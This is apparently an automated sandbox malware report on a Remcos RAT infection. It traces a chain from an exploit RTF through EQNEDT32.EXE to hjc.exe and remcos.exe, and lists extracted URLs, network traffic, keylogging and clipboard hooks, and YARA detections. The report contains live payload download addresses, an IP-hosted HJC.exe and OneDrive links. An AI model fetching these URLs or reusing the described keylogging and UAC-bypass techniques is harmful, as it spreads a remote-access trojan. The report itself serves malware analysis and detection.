                        Source: remcos.exe, 0000000D.00000003.427152413.00000000008BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.facebook.com (Facebook)
                        Source: remcos.exe, 0000000D.00000003.427152413.00000000008BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginaultGetItem equals www.yahoo.com (Yahoo)
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                        Source: remcos.exe, 0000000D.00000002.428464556.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                        Source: unknownDNS traffic detected: queries for: onedrive.live.com
                        Source: EQNEDT32.EXE, 00000002.00000002.354533664.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.198.26.173/360/HJC.exe
                        Source: EQNEDT32.EXE, 00000002.00000002.354533664.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.198.26.173/360/HJC.exehhC:
                        Source: EQNEDT32.EXE, 00000002.00000002.355378039.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.198.26.173/360/HJC.exej
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                        Source: remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comode
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/A
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: hjc.exe, 00000005.00000002.372380692.00000000002F6000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: hjc.exe, 00000005.00000002.372380692.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                        Source: hjc.exe, remcos.exe, 00000009.00000002.845790757.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.399805093.0000000000799000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.486603942.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.427901671.00000000007A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: hjc.exe, 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                        Source: bhvF6ED.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                        Source: bhvF6ED.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                        Source: remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/7
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/9
                        Source: remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/e
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/v
                        Source: remcos.exe, 00000019.00000002.496112461.000000001477B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=FDB0512DE79
                        Source: remcos.exe, 00000019.00000002.496003835.0000000014630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=FDB0512DE793B32E%21191&authkey=
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4m1QphtspBBMGygafIGFYGxEUuSWjKY2dMrUpXGeJNpqtj0i_A5B0XA1Aj7IMN8zjT
                        Source: remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4m8jjd3f9BpBLsSbDI3D4w4BLmop1yruq85sZlFAr-4Rol8mEokjtpsS6ivaddcrG-
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mTC_XyZRHB379OztWxqX44YH0ZY7OaAZhjXGrl4fCtKBoRTQqeK6A_lQZwfjwKNP7
                        Source: remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mYCQQoHB3biLh5JPth5_f-kOB87DNi8p0jtMSHrwPoPCEVl-mpqMaKw_mqKIpuxjn
                        Source: remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mio8rSS_2jC5-0VIhrGMPPnTg6gYb3Bxmu9ktmO2sVy1Vu5NgT_hEOa73bPesLFGH
                        Source: hjc.exe, 00000005.00000002.372380692.0000000000345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mpZ
                        Source: hjc.exe, 00000005.00000003.369181364.0000000000330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mpZajfWPqKjdE4uGrq5tmWJHmffdrvebeUi1KiWBx9grNpUr-Q2JlZ3LArHG3A_O0
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: hjc.exe, 00000005.00000002.372380692.00000000002F6000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                        Source: remcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=ph
                        Source: remcos.exe, 0000000D.00000003.426556869.0000000002145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
                        Source: remcos.exe, 00000014.00000003.427230433.0000000002096000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.426945991.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427677327.00000000020AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: remcos.exe, 0000000D.00000003.426556869.0000000002145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/h
                        Source: remcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.comH
                        Source: remcos.exe, 0000000D.00000003.422403574.000000000026E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.426945991.0000000001C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.
                        Source: remcos.exe, 00000009.00000002.850738765.000000002E060000.00000004.00000001.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.391269695.000000002E060000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427230433.0000000002096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.c
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                        Source: remcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CAA2B8 SetWindowsHookExA 0000000D,15CAA2A4,00000000 5_2_15CAA2B8
                        Source: C:\ProgramData\Remcos\remcos.exe Windows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exe
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Code function: 5_2_15CAB70E OpenClipboard,GetClipboardData,CloseClipboard, 5_2_15CAB70E
                        Source: Yara match File source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR

                        E-Banking Fraud

                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\fggrt\logs.dat, type: DROPPED

                        System Summary

                        Source: OKhCyJ619J.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
